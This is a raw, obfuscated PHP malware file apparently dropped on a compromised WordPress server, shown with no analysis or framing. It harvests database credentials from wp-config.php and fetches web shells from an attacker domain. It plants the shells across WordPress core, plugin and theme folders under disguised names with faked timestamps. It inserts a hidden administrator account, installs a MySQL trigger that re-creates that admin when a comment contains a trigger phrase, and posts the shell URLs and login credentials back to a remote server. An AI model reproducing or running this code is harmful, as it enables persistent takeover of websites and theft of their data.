File: //proc/thread-self/root/tmp/wpct_pnCzNG.php
<?php if (!defined('GLOB_BRACE')) { define('GLOB_BRACE', 0); } define('CURRENTDIR', getcwd());
define('UPLOAD_SHELL', 1);
define('OUT', 2);
define('API_PATH', 'http://march03252.com/src/accsec.php');
/** without http * */
define('PATH_TO_BACK_SHELL', 'wp-top.com/greh');
/** without http * */
$ncwozscrpb = 'http://march03252.com/src/temp/7ec321cf0a8b70aea4e55ac145acd2f9';
$nuxjyefralcj = gekrjsak();
$vpevfosgrhny = 'wpupdate';
$wzpqtexa = bohomxfrq();
$zkopslhlsbm = $nuxjyefralcj[1];
$mbzuowj = $wzpqtexa;
$dthrqbajjus = '';
$oegahd = 'https://wordpress.com';
$aeaggdm = ofsszm('2019-07-09 00:00:00', '2023-08-27 00:00:00');
$odcnbgrpma = '';
$dexgebhe = '0';
$hptciw = $wzpqtexa;
if (is_null($fpbvjnj = ibozxzef())) {
echo 'invalid detect wp root dir';
exit;
}
if (!function_exists('file_put_contents')) {
function file_put_contents($tnxzltcu, $nfwfvcbykrm) {
$bmbyuhpwbd = @fopen($tnxzltcu, 'w');
if (!$bmbyuhpwbd) {
return false;
} else {
$ctkmhlmmv = fwrite($bmbyuhpwbd, $nfwfvcbykrm);
fclose($bmbyuhpwbd);
return $ctkmhlmmv;
}
}
}
$hovstl = array();
if (!file_exists($ffgghgej = $fpbvjnj . '/wp-config.php')) {
echo 'wp-config not found';
exit;
}
$imqqridamtsk = file_get_contents($ffgghgej);
preg_match_all("~^define.*(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)[\'\"],\s*[\'\"](.+)[\'\"]\s*\);~m", $imqqridamtsk, $yqmkyeuz);
preg_match("~table_prefix\s+=\s*[\'\"](.+)[\'\"];~", $imqqridamtsk, $cqcdhrgd);
$qagrskudc = $yqmkyeuz[2][0];
$sajrci = $yqmkyeuz[2][1];
$jqrrdwbmnz = $yqmkyeuz[2][2];
$jvpjgpkkjith = $yqmkyeuz[2][3];
$dyjocdlud = $cqcdhrgd[1];
$mbxqemo = rshylpcub($wzpqtexa, $zkopslhlsbm, $mbzuowj, $dthrqbajjus, $oegahd, $aeaggdm, $odcnbgrpma, $dexgebhe, $hptciw, $qagrskudc, $dyjocdlud);
$ccexbwoqu = mysqli_connect($jvpjgpkkjith, $sajrci, $jqrrdwbmnz, $qagrskudc);
if (!$ccexbwoqu) {
require_once($fpbvjnj . '/wp-config.php');
$tplmxq = get_defined_constants(true);
if (!$tplmxq['user']) {
throw new \Exception("Could not connect");
}
$qagrskudc = $tplmxq['user']['DB_NAME'];
$sajrci = $tplmxq['user']['DB_USER'];
$jqrrdwbmnz = $tplmxq['user']['DB_PASSWORD'];
$jvpjgpkkjith = $tplmxq['user']['DB_HOST'];
$dyjocdlud = $cqcdhrgd[1];
$ccexbwoqu = mysqli_connect($jvpjgpkkjith, $sajrci, $jqrrdwbmnz, $qagrskudc);
}
$ecaexpvb = $_SERVER['HTTP_HOST'];
if (mysqli_connect_errno()) {
$tvpwyuxd = 1;
echo "Could not connect" . PHP_EOL;
} else {
echo "Connected successfully" . PHP_EOL;
$zhsysqayr = mysqli_query($ccexbwoqu, "select * from " . $dyjocdlud . "options where option_name = 'home' or option_name = 'siteurl'");
$yxnvlluow = mysqli_fetch_row($zhsysqayr);
if (stristr($yxnvlluow[2], 'http') !== false) {
$ecaexpvb = $yxnvlluow[2];
}
if (stristr($yxnvlluow[3], 'http') !== false) {
$ecaexpvb = $yxnvlluow[3];
}
}
if (UPLOAD_SHELL === 1) {
if (!function_exists('curl_init')) {
$cxfoxknopg = qzkqx($ncwozscrpb);
define('USE_FGC', 1);
} else {
$cxfoxknopg = eajkkecpv($ncwozscrpb);
}
if (!$cxfoxknopg) {
echo 'check sh domain' . PHP_EOL;
exit;
}
if ($cxfoxknopg[1] === 403) {
echo 'firewall in action!';
exit;
}
if ($cxfoxknopg[1] !== 200) {
echo 'need update script' . PHP_EOL;
exit;
}
$ososahoshw = $cxfoxknopg[0];
$sdyxtgfe = unserialize(base64_decode($ososahoshw));
$copapaizgv = array('variable', 'function', 'class', 'object', 'array', 'string', 'integer', 'boolean', 'float', 'double', 'character', 'list', 'set', 'queue', 'stack', 'pointer', 'reference', 'constructor', 'interface', 'method', 'event', 'exception', 'loop', 'condition', 'statement', 'module', 'package', 'library', 'framework', 'compiler', 'interpreter', 'database', 'sql', 'query', 'index', 'table', 'view', 'trigger', 'schema', 'git', 'repository', 'branch', 'merge', 'client', 'encryption', 'decryption', 'hashing', 'session', 'cookie', 'json', 'xml', 'restful', 'soap', 'url', 'http', 'https', 'dns', 'firewall', 'security', 'ajax-response', 'cron', 'stream', 'private', 'meta', 'wp', 'core', 'ajax', 'beta', 'alpha', 'sample', 'path', 'request', 'old', 'info', 'base', 'num', 'all', 'stat', 'new', 'plain', 'add', 'edit', 'live', 'pic', 'less', 'more', 'part', 'get', 'long', 'call', 'first', 'time', 'other');
$qtnyxxtovae = gijhjipzb($fpbvjnj . '/wp-admin', 3);
$rymiwy = gijhjipzb($fpbvjnj . '/wp-content/plugins', 3);
$pzubpm = gijhjipzb($fpbvjnj . '/wp-includes', 3);
$huabafos = gijhjipzb($fpbvjnj . '/wp-content/themes', 3);
$mqvkfuejvzc = array_merge($qtnyxxtovae, $rymiwy, $pzubpm, $huabafos);
$gslmoiej = count($copapaizgv);
$mkfyje = $fpbvjnj . '/wp-config-sample.php';
$jaimcn = $sdyxtgfe['wp-config-sample.php?config'];
$zuqdxqqfia = $copapaizgv[rand(0, $gslmoiej - 1)] . wmojqfqdn(rand(3, 6));
$xlfdblqvjr = '$_GET[\'' . $zuqdxqqfia . '\']';
$jaimcn = str_replace('$_GET[\'config\']', $xlfdblqvjr, $jaimcn);
file_put_contents($mkfyje, $jaimcn);
touch($mkfyje, smjzkmwhz(dirname($mkfyje)));
$hovstl[] = yicsdqg($fpbvjnj, $mkfyje . '?' . $zuqdxqqfia, $ecaexpvb);
unset($sdyxtgfe['wp-config-sample.php?config']);
if (empty($mqvkfuejvzc)) {
echo 'no directories to write' . PHP_EOL;
exit;
}
$tnlohvgzoeg = array_keys($sdyxtgfe);
foreach ($mqvkfuejvzc as $whplfuuhm) {
if (empty($tnlohvgzoeg)) {
$tnlohvgzoeg = array_keys($sdyxtgfe);
}
$uoyvmelz = str_replace('.php', '-' . $copapaizgv[rand(0, $gslmoiej - 1)] . '.php', $whplfuuhm);
$ksdjppavxi = array_shift($tnlohvgzoeg);
$vfzvoycentb = $sdyxtgfe[$ksdjppavxi];
file_put_contents($uoyvmelz, $vfzvoycentb);
touch($uoyvmelz, smjzkmwhz(dirname($uoyvmelz)));
$jtvjiu = explode('?', $ksdjppavxi);
$qrvocubdmu = yicsdqg($fpbvjnj, $uoyvmelz, $ecaexpvb);
$hovstl[] = (isset($jtvjiu[1])) ? $qrvocubdmu . '?' . hbgel($jtvjiu[1]) : $qrvocubdmu;
}
}
function hbgel($jtvjiu) {
if (defined('PATH_TO_BACK_SHELL') && (stristr($jtvjiu, 'example.com') !== false)) {
return str_replace('example.com', PATH_TO_BACK_SHELL, $jtvjiu);
}
return $jtvjiu;
}
if (!isset($tvpwyuxd)) {
$xvvbwjexrqii = luuer($ecaexpvb);
$pgoaxlr = "update `${dyjocdlud}options` set option_value = '' WHERE `option_name` LIKE 'close_comments_for_old_posts'";
if (!mysqli_query($ccexbwoqu, $pgoaxlr)) {
echo 'invalid set value 0 for option >>close_comments_value<<' . PHP_EOL;
}
$wfzukkghw = "UPDATE `${dyjocdlud}posts` set ping_status = 'open' where (post_type = 'page' OR post_type = 'post') AND post_status = 'publish' AND guid LIKE '%${xvvbwjexrqii}%' ORDER BY id LIMIT 5";
$hbmyzyjpa = array();
if (mysqli_query($ccexbwoqu, $wfzukkghw)) {
//echo 'posts ready to accept trackbacks' . PHP_EOL;
$gemccpa = "select id, guid, post_name from `${dyjocdlud}posts` where (post_type = 'page' OR post_type = 'post') AND post_status = 'publish' AND guid LIKE '%${xvvbwjexrqii}%' ORDER BY id LIMIT 5";
$ssjnbroqnkgo = mysqli_query($ccexbwoqu, $gemccpa);
while ($zycrjry = mysqli_fetch_array($ssjnbroqnkgo)) {
$hbmyzyjpa[] = array($zycrjry['id'], $zycrjry['guid'], $zycrjry['post_name']);
}
}
//$uumcwgkr = "SELECT * FROM `${dyjocdlud}users` WHERE `user_pass` = '$zkopslhlsbm'";
$uumcwgkr = "SELECT * FROM `${dyjocdlud}users` WHERE `user_login` = '$wzpqtexa' order by id desc limit 1";
$fpjvdn = "SELECT * FROM `${dyjocdlud}users` WHERE `user_login` = '$vpevfosgrhny'";
$wrvpzlsbjvir = mysqli_query($ccexbwoqu, $uumcwgkr);
$aqrifulz = mysqli_query($ccexbwoqu, $fpjvdn);
if (mysqli_num_rows($aqrifulz)) {
$dfvyty = "delete from `${dyjocdlud}users` WHERE `user_login` = '$vpevfosgrhny'";
mysqli_query($ccexbwoqu, $dfvyty);
}
if (!mysqli_num_rows($wrvpzlsbjvir)) {
$noogxyzls = mysqli_query($ccexbwoqu, "SELECT ID from `" . $qagrskudc . "`.`" . $dyjocdlud . "users` ORDER BY `ID` DESC LIMIT 1");
$keodcattbf = mysqli_fetch_row($noogxyzls);
$ddehqutkfdq = (int)++$keodcattbf[0];
mysqli_query($ccexbwoqu, "INSERT INTO `" . $qagrskudc . "`.`" . $dyjocdlud . "users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('$ddehqutkfdq', '$wzpqtexa', '$zkopslhlsbm', '$mbzuowj', '$dthrqbajjus', '$oegahd', '$aeaggdm', '$odcnbgrpma', '$dexgebhe', '$hptciw')");
mysqli_query($ccexbwoqu, "INSERT INTO `" . $qagrskudc . "`.`" . $dyjocdlud . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, $ddehqutkfdq, '" . $dyjocdlud . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')");
mysqli_query($ccexbwoqu, "INSERT INTO `" . $qagrskudc . "`.`" . $dyjocdlud . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, $ddehqutkfdq, '" . $dyjocdlud . "user_level', '10')");
//echo $ecaexpvb . " admin inserted" . PHP_EOL;
echo sprintf('%s admin inserted %s::%s', $ecaexpvb, $wzpqtexa, $nuxjyefralcj[0]) . PHP_EOL;
$owqqipgijhpe = 1;
mysqli_query($ccexbwoqu, "DROP TRIGGER IF EXISTS `after_insert_comment`");
try {
if (mysqli_query($ccexbwoqu, $mbxqemo)) {
echo 'trigger created' . str_repeat(PHP_EOL, 3);
}
} catch (\Exception $rqdhvfri) {
echo $rqdhvfri->getMessage() . PHP_EOL;
}
} else {
while ($vitfmjdnz = mysqli_fetch_array($wrvpzlsbjvir)) {
$afgbemq = $vitfmjdnz['user_pass'];
}
$nzjqdl = "SHOW TRIGGERS";
$wcrifr = mysqli_query($ccexbwoqu, $nzjqdl);
if ($wcrifr) {
while ($dopjkij = mysqli_fetch_array($wcrifr)) {
if ($dopjkij['Trigger'] === 'after_insert_comment') {
if (strpos($dopjkij['Statement'], $afgbemq) !== false) {
//echo 'hash and trigger matched!';
break;
} else {
//echo 'not matched need drop trigger';
mysqli_query($ccexbwoqu, "DROP TRIGGER IF EXISTS `after_insert_comment`");
try {
$mbxqemo = rshylpcub($wzpqtexa, $afgbemq, $mbzuowj, $dthrqbajjus, $oegahd, $aeaggdm, $odcnbgrpma, $dexgebhe, $hptciw, $qagrskudc, $dyjocdlud);
if (mysqli_query($ccexbwoqu, $mbxqemo)) {
echo 'trigger created' . str_repeat(PHP_EOL, 3);
}
} catch (\Exception $rqdhvfri) {
echo $rqdhvfri->getMessage() . PHP_EOL;
}
}
break;
}
}
}
echo $ecaexpvb . ' admin exists' . PHP_EOL;
}
mysqli_close($ccexbwoqu);
}
echo implode("\n", $hovstl) . "\n";
$hovstl['host'] = $ecaexpvb;
if (!empty($hbmyzyjpa)) {
$hovstl['trackbacks'] = $hbmyzyjpa;
}
if (isset($owqqipgijhpe)) {
$hovstl['authdata'] = array($wzpqtexa, $nuxjyefralcj[0]);
}
$hovstl['out'] = OUT;
$ptluvy = vhjmfl(API_PATH, array('source' => base64_encode(serialize($hovstl)),));
if (trim($ptluvy) !== 'success') {
echo "!!!!error while sending data!!!!" . PHP_EOL;
exit;
}
echo str_repeat('_', 400) . "\n";
function ibozxzef() {
if (file_exists(CURRENTDIR . '/wp-config.php')) {
return CURRENTDIR;
}
$zyslxrhpy = preg_replace('~\/(wp-admin|wp-includes|wp-content).*$~', '', CURRENTDIR);
if (file_exists($zyslxrhpy . '/wp-config.php')) {
return $zyslxrhpy;
}
return null;
}
function qzkqx($qrvocubdmu) {
$kuftyvn = stream_context_create(array('http' => array('ignore_errors' => true)));
$nfwfvcbykrm = @file_get_contents($qrvocubdmu, false, $kuftyvn);
if ($nfwfvcbykrm === false) {
$pfyuufq = error_get_last();
//echo "HTTP request failed. Error was: " . $pfyuufq['message'];
return false;
} else {
$xgvakdmatot = null;
if (!empty($feeaewstckol) && isset($feeaewstckol[0])) {
preg_match('{HTTP\/\S*\s(\d{3})}', $feeaewstckol[0], $uufkfflct);
$xgvakdmatot = intval($uufkfflct[1]);
}
return array($nfwfvcbykrm, $xgvakdmatot);
}
}
function eajkkecpv($qrvocubdmu) {
$hepfzxyzj = curl_init();
curl_setopt($hepfzxyzj, CURLOPT_URL, $qrvocubdmu);
curl_setopt($hepfzxyzj, CURLOPT_HEADER, 0);
curl_setopt($hepfzxyzj, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($hepfzxyzj, CURLOPT_TIMEOUT, 10);
$nfwfvcbykrm = curl_exec($hepfzxyzj);
if (!$nfwfvcbykrm) {
return false;
}
$vvsngw = curl_getinfo($hepfzxyzj, CURLINFO_HTTP_CODE);
curl_close($hepfzxyzj);
return array($nfwfvcbykrm, $vvsngw);
}
function vhjmfl($qrvocubdmu, $nfwfvcbykrm) {
if (defined('USE_FGC')) {
return ldzluv($qrvocubdmu, $nfwfvcbykrm);
}
return cjrjkh($qrvocubdmu, $nfwfvcbykrm);
}
function ldzluv($qrvocubdmu, $nfwfvcbykrm) {
$trhftgubolm = http_build_query($nfwfvcbykrm);
$wzqcorfkdrnx = array(
'http' => array(
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => $trhftgubolm,
'timeout' => 10,
),
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false,
),
);
$kuftyvn = stream_context_create($wzqcorfkdrnx);
$enttfiwat = @file_get_contents($qrvocubdmu, false, $kuftyvn);
$xgvakdmatot = null;
if (isset($feeaewstckol[0])) {
preg_match('{HTTP\/\S*\s(\d{3})}', $feeaewstckol[0], $uufkfflct);
$xgvakdmatot = intval($uufkfflct[1]);
}
return ($xgvakdmatot === 200) ? trim($enttfiwat) : null;
}
function cjrjkh($qrvocubdmu, $nfwfvcbykrm) {
$hepfzxyzj = curl_init();
curl_setopt($hepfzxyzj, CURLOPT_URL, $qrvocubdmu);
curl_setopt($hepfzxyzj, CURLOPT_RETURNTRANSFER, true);
curl_setopt($hepfzxyzj, CURLOPT_TIMEOUT, 10);
curl_setopt($hepfzxyzj, CURLOPT_POST, true);
curl_setopt($hepfzxyzj, CURLOPT_POSTFIELDS, $nfwfvcbykrm);
curl_setopt($hepfzxyzj, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($hepfzxyzj, CURLOPT_SSL_VERIFYPEER, 0);
$enttfiwat = curl_exec($hepfzxyzj);
$junvxx = curl_getinfo($hepfzxyzj);
curl_close($hepfzxyzj);
return ($junvxx["http_code"] == 200) ? trim($enttfiwat) : null;
}
function smjzkmwhz($uvjbtqrhds) {
foreach (glob($uvjbtqrhds . "/*php") as $ctypkyzbvy) {
$ntpiytjzwlqx[] = filemtime($ctypkyzbvy);
}
$ungaliszyy = array_count_values($ntpiytjzwlqx);
arsort($ungaliszyy);
$tnlohvgzoeg = array_keys($ungaliszyy);
return array_shift($tnlohvgzoeg);
}
function yicsdqg($lytqjz, $uoyvmelz, $xvvbwjexrqii = null) {
$xvvbwjexrqii = !$xvvbwjexrqii ? 'http://' . $_SERVER['HTTP_HOST'] : $xvvbwjexrqii;
$actzeiqi = str_replace($lytqjz, '', $uoyvmelz);
return rtrim($xvvbwjexrqii, '/') . DIRECTORY_SEPARATOR . ltrim($actzeiqi, '/');
}
function zvqxdun($enkzps, $ynhqikjptr = 1) {
if (!is_dir($enkzps)) {
return;
}
$syfphunvys = realpath($enkzps);
$svnexjmojvxg = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($syfphunvys), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
$svnexjmojvxg->setMaxDepth($ynhqikjptr);
foreach ($svnexjmojvxg as $rmbjkmddr => $tybhxfpu) {
if (($syfphunvys = $tybhxfpu->getPath()) === $enkzps) {
continue;
}
if (is_dir($tybhxfpu) && is_writeable($tybhxfpu)) {
$ntpiytjzwlqx[] = $syfphunvys;
}
}
return array_unique($ntpiytjzwlqx);
}
function gijhjipzb($enkzps, $kwiebad = 2, $ynhqikjptr = 1) {
if (!is_dir($enkzps)) {
return;
}
$syfphunvys = realpath($enkzps);
$svnexjmojvxg = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($syfphunvys), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
$svnexjmojvxg->setMaxDepth($ynhqikjptr);
$ntpiytjzwlqx = array();
foreach ($svnexjmojvxg as $rmbjkmddr => $tybhxfpu) {
$syfphunvys = $tybhxfpu->getPathName();
if (stristr($syfphunvys, '.php') === false) {
continue;
}
if (!is_writeable(dirname($syfphunvys))) {
continue;
}
$ntpiytjzwlqx[$syfphunvys] = 1;
}
$rjrpemo = array_keys($ntpiytjzwlqx);
shuffle($rjrpemo);
return array_slice($rjrpemo, 0, $kwiebad);
}
function rshylpcub($wzpqtexa, $zkopslhlsbm, $mbzuowj, $dthrqbajjus, $oegahd, $aeaggdm, $odcnbgrpma, $dexgebhe, $hptciw, $qagrskudc, $dyjocdlud) {
$krfoszgs = <<<STR
CREATE TRIGGER `after_insert_comment` AFTER INSERT ON `${qagrskudc}`.`${dyjocdlud}comments`
FOR EACH ROW BEGIN
IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `${qagrskudc}`.`${dyjocdlud}users`);
SET @nextWpUsersID = @lastInsertWpUsersId + 1;
INSERT INTO `${qagrskudc}`.`${dyjocdlud}users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, '${wzpqtexa}', '${zkopslhlsbm}', '${mbzuowj}', '${dthrqbajjus}', '${oegahd}', '${aeaggdm}', '${odcnbgrpma}', '${dexgebhe}', '${hptciw}');
INSERT INTO `${qagrskudc}`.`${dyjocdlud}usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, '${dyjocdlud}capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
INSERT INTO `${qagrskudc}`.`${dyjocdlud}usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, '${dyjocdlud}user_level', '10');
END IF;
END;
STR;
return $krfoszgs;
}
function luuer($qrvocubdmu) {
$xvvbwjexrqii = parse_url($qrvocubdmu, PHP_URL_HOST);
return str_replace('www.', '', $xvvbwjexrqii);
}
function ofsszm($ldbjfczmk, $xqulxgi, $alyzolrydfvm = 'Y-m-d H:i:s') {
$oqtctzoc = strtotime($ldbjfczmk);
$fclcktqam = strtotime($xqulxgi);
$fpyjeluklsqh = mt_rand($oqtctzoc, $fclcktqam);
return date($alyzolrydfvm, $fpyjeluklsqh);
}
function wmojqfqdn($hjpujxzing, $bkannngwu = false) {
$opyxhpierpr = "abcdefghijklmnopqrstuvwxyz";
if ($bkannngwu) {
$opyxhpierpr .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~><?}{[];!@#$%^&*()_+-={}[]:;<=>?@';
}
$fioejtrmnnsh = strlen($opyxhpierpr);
$dbcanidf = "";
for ($hayymqdpfb = 0; $hayymqdpfb < $hjpujxzing; $hayymqdpfb++) {
$dbcanidf .= $opyxhpierpr[rand(0, $fioejtrmnnsh - 1)];
}
return $dbcanidf;
}
function bohomxfrq() {
preg_match_all('~\d~', md5($_SERVER['HTTP_HOST']), $olymqxg);
$eubraofa = $olymqxg[0][0];
$iootoriwf = end($olymqxg[0]);
$cgdhsladyy = array('wp', 'cms', 'web', 'dev', 'blog', 'main', 'articles', 'notes', 'news', 'archive',);
$radpuincxp = array('panel', 'feed', 'client', 'user', 'rss', 'option', 'auth', 'table', 'user', 'profile',);
return $cgdhsladyy[$eubraofa] . $radpuincxp[$iootoriwf];
}
function pfjet($qqajnieouqob, $mepmbri) {
$wlniosm = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
define('ITOA64_CUSTOM', $wlniosm);
if ($qqajnieouqob < 4 || $qqajnieouqob > 31) {
$qqajnieouqob = 8;
}
define('ITERATION_COUNT_LOG2_CUSTOM', $qqajnieouqob);
define('PORTABLE_HASHES_CUSTOM', $mepmbri);
$luvlkkycnfe = microtime();
if (function_exists('getmypid')) {
$luvlkkycnfe .= getmypid();
}
define('RANDOM_STATE_CUSTOM', $luvlkkycnfe);
}
function wnzsyhrig($ykqanj) {
if (strlen($ykqanj) > 4096) {
return '*';
}
$quwxvs = '';
if (CRYPT_BLOWFISH === 1 && !PORTABLE_HASHES_CUSTOM) {
$quwxvs = eqado(16);
$ggslcqfpqpp = crypt($ykqanj, habxwhs($quwxvs));
if (strlen($ggslcqfpqpp) === 60) {
return $ggslcqfpqpp;
}
}
if (strlen($quwxvs) < 6) {
$quwxvs = eqado(6);
}
$ggslcqfpqpp = ziadv($ykqanj, xmdmswtj($quwxvs));
if (strlen($ggslcqfpqpp) === 34) {
return $ggslcqfpqpp;
}
return '*';
}
function eqado($ungaliszyy) {
$usmyxj = '';
if (@is_readable('/dev/urandom') && ($qzeajd = @fopen('/dev/urandom', 'rb'))) {
$usmyxj = fread($qzeajd, $ungaliszyy);
fclose($qzeajd);
}
if (strlen($usmyxj) < $ungaliszyy) {
$usmyxj = '';
$lozlxyzoe = RANDOM_STATE_CUSTOM;
for ($hayymqdpfb = 0; $hayymqdpfb < $ungaliszyy; $hayymqdpfb += 16) {
$lozlxyzoe = md5(microtime() . $lozlxyzoe);
$usmyxj .= md5($lozlxyzoe, TRUE);
}
$usmyxj = substr($usmyxj, 0, $ungaliszyy);
}
return $usmyxj;
}
function habxwhs($bhcbyyrccg) {
$wlniosm = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$usmyxj = '$2a$';
$usmyxj .= chr((int)(ord('0') + ITERATION_COUNT_LOG2_CUSTOM / 10));
$usmyxj .= chr(ord('0') + ITERATION_COUNT_LOG2_CUSTOM % 10);
$usmyxj .= '$';
$hayymqdpfb = 0;
do {
$qqjpmqtbrl = ord($bhcbyyrccg[$hayymqdpfb++]);
$usmyxj .= $wlniosm[$qqjpmqtbrl >> 2];
$qqjpmqtbrl = ($qqjpmqtbrl & 0x03) << 4;
if ($hayymqdpfb >= 16) {
$usmyxj .= $wlniosm[$qqjpmqtbrl];
break;
}
$xxvdgic = ord($bhcbyyrccg[$hayymqdpfb++]);
$qqjpmqtbrl |= $xxvdgic >> 4;
$usmyxj .= $wlniosm[$qqjpmqtbrl];
$qqjpmqtbrl = ($xxvdgic & 0x0f) << 2;
$xxvdgic = ord($bhcbyyrccg[$hayymqdpfb++]);
$qqjpmqtbrl |= $xxvdgic >> 6;
$usmyxj .= $wlniosm[$qqjpmqtbrl];
$usmyxj .= $wlniosm[$xxvdgic & 0x3f];
} while (1);
return $usmyxj;
}
function ziadv($ykqanj, $ymvsztiisv) {
$usmyxj = '*0';
if (substr($ymvsztiisv, 0, 2) === $usmyxj) {
$usmyxj = '*1';
}
$ycsifwsc = substr($ymvsztiisv, 0, 3);
//if ($ycsifwsc !== '$hpbmwqukyod$' && $ycsifwsc !== '$ptkxex$') {
if ($ycsifwsc !== base64_decode('JFAk') && $ycsifwsc !== base64_decode('JEgk')) {
return $usmyxj;
}
$diusllmzvm = strpos(ITOA64_CUSTOM, $ymvsztiisv[3]);
if ($diusllmzvm < 7 || $diusllmzvm > 30) {
return $usmyxj;
}
$ungaliszyy = 1 << $diusllmzvm;
$zsvxvavhw = substr($ymvsztiisv, 4, 8);
if (strlen($zsvxvavhw) !== 8) {
return $usmyxj;
}
$ggslcqfpqpp = md5($zsvxvavhw . $ykqanj, TRUE);
do {
$ggslcqfpqpp = md5($ggslcqfpqpp . $ykqanj, TRUE);
} while (--$ungaliszyy);
$usmyxj = substr($ymvsztiisv, 0, 12);
$usmyxj .= lltyhzvn($ggslcqfpqpp, 16);
return $usmyxj;
}
function lltyhzvn($bhcbyyrccg, $ungaliszyy) {
$usmyxj = '';
$hayymqdpfb = 0;
$wlniosm = ITOA64_CUSTOM;
do {
$zfkvpo = ord($bhcbyyrccg[$hayymqdpfb++]);
$usmyxj .= $wlniosm[$zfkvpo & 0x3f];
if ($hayymqdpfb < $ungaliszyy) {
$zfkvpo |= ord($bhcbyyrccg[$hayymqdpfb]) << 8;
}
$usmyxj .= $wlniosm[($zfkvpo >> 6) & 0x3f];
if ($hayymqdpfb++ >= $ungaliszyy) {
break;
}
if ($hayymqdpfb < $ungaliszyy) {
$zfkvpo |= ord($bhcbyyrccg[$hayymqdpfb]) << 16;
}
$usmyxj .= $wlniosm[($zfkvpo >> 12) & 0x3f];
if ($hayymqdpfb++ >= $ungaliszyy) {
break;
}
$usmyxj .= $wlniosm[($zfkvpo >> 18) & 0x3f];
} while ($hayymqdpfb < $ungaliszyy);
return $usmyxj;
}
function xmdmswtj($bhcbyyrccg) {
//$usmyxj = '$hpbmwqukyod$';
$usmyxj = base64_decode('JFAk');
$wlniosm = ITOA64_CUSTOM;
$usmyxj .= $wlniosm[min(ITERATION_COUNT_LOG2_CUSTOM + 5, 30)];
$usmyxj .= lltyhzvn($bhcbyyrccg, 6);
return $usmyxj;
}
function gekrjsak() {
$xjqslupmo = wmojqfqdn(rand(20, 40), true);
pfjet(4, true);
$ggslcqfpqpp = wnzsyhrig($xjqslupmo);
return array($xjqslupmo, $ggslcqfpqpp);
}